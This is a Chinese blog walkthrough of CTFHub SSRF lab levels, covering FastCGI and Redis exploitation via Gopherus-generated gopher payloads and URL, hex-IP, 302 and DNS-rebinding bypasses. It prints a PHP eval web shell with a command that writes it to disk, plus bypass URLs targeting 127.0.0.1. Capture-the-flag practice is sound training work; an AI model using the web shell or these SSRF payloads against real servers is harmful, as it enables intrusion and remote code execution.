ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)

于 2024-08-28 14:46:30 发布
阅读量210 收藏 1
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82061181/article/details/141632681
版权

less-6  FastCGI协议

步骤一:开启环境,查看提示

步骤二:对一句话木马进行base64编码:<?php @eval($_POST[cmd]);?>

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤三:利用kali,使用Gopherus工具生成payload:

python2 '/home/kali/Desktop/Gopherus/gopherus.py' --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤四:对所生成进行url编码

步骤五:添加到?url=

访问木马程序

步骤六:利用中国菜刀进行连接

找寻flag

显示提交成功

less-7  Redis协议

步骤一:开启环境,查看提示

步骤三:利用kali,使用Gopherus工具生成payload:

利用url进行编码

添加?url=

访问shell.php

利用中国菜刀进行连接

找到flag

显示提交成功

less-8  URL Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=http://notfound.ctfhub.com@127.0.0.1/flag.php

显示提交成功

less-9  数字IP Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

进行进制转换,.换成0

输入:url=http://0x7f000001/flag.php

显示提交成功

less-10  302跳转 Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=localhost/flag.php

显示提交成功

less-11  DNS重绑定 Bypass

步骤一:开启环境,查看提示

打开题目附件

rbndr.us dns rebinding service (cmpxchg8b.com)

url=http://7f000001.7f000002.rbndr.us/flag.php

显示提交成功

云舒zovn
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
2401_85783544的博客
07-24 1015
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2344
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1054
CTFHub技能树-web-ssrf
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6579
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
CTFHub-Web-SSRF解题过程
2401_86440467的博客
08-10 1186
开启环境访问后,url=后添加如下,得到flag。
ctfhub-web-SSRF通关攻略
2301_80402555的博客
08-27 152
所以在url后输入file:///var/www/html/flag.php,发现页面没有显示flag。2、在url后输入http://127.0.0.1/flah.php 页面出现文件提交。2、在url后输入http://127.0.0.1/flag.php 页面出现搜索框。3、结合本题要求,在url后输入http://127.0.0.1/flag.php。3、查看页面源代码,将key后边的值输入到搜索框中。6、将编码后的数据中的%0a替换为%0d%0a。6、将编码后的数据中的%0A替换为%0D%0A。
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS绑定 Bypass)
Wking
08-17 2913
SSRF相关题目实战
CTFhub-WEB-SSRF
m0_74214882的博客
07-29 388
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限 制吧 原则@绕过。复制代码进行二次编码,第一次编码后将%0A转换为%0D%0A结尾加%0D%0A。通过 file:// 伪协议来读取 flag.php 源代码。将生成的gopher进行url编码在次访问页面获得falg。尝试访问位于127.0.0.1的flag.php吧。尝试去读取一下Web目录下的flag.php。打开此网站,获取内网IP的域名并访问。发现禁用ip127.0.0.1。
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2982
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7033
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 377
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
CTFHub ssrf
07-29
在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转BypassDNS绑定 Bypass。...
CTFHUB SSRF文件上传
07-28
- *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm...
web安全】SSRF的各种利用方式
HBohan的博客
04-19 1860
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8421
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等.
在 GNU RADIO(软件定义无线电或 SDR)上实现 OFDM 和 OTFS 收发器
08-27
OTFS 和 OFDM 收发器 在 GNU 无线电(软件定义无线电或 SDR)上实现 OFDM 和 OTFS 收发器 OFDM 是一种专用的 FDM,其约束是主信号被划分的子流彼此正交。正交信号是相互垂直的信号。正交信号的一个主要特性是它们不会相互干扰。 OTFS 收发器: 上述收发器在多普勒频移相当高(例如,几千赫兹的多普勒)的高迁移率场景中表现不佳。正交时频空间 (OTFS) 是最近提出的一种无线接入技术波形,在高移动性环境中表现非常好。它是一种二维调制方案,其中信息符号在延迟多普勒域中多路复用。 下面是城市多通道场景中的无线信道示例,说明了与时频表示相比,延迟多普勒表示中信道的稀疏性和缓慢变化性。OTFS 调制利用了信道的延迟多普勒模型的缓慢变化。
毕业设计(论文)-载体姿态测量系统硬件电路设计.docx
最新发布
08-27
毕业设计(论文)-载体姿态测量系统硬件电路设计.docx
java基于ssm+vue社区团购网站管理系统源码
08-27
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;VUE技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值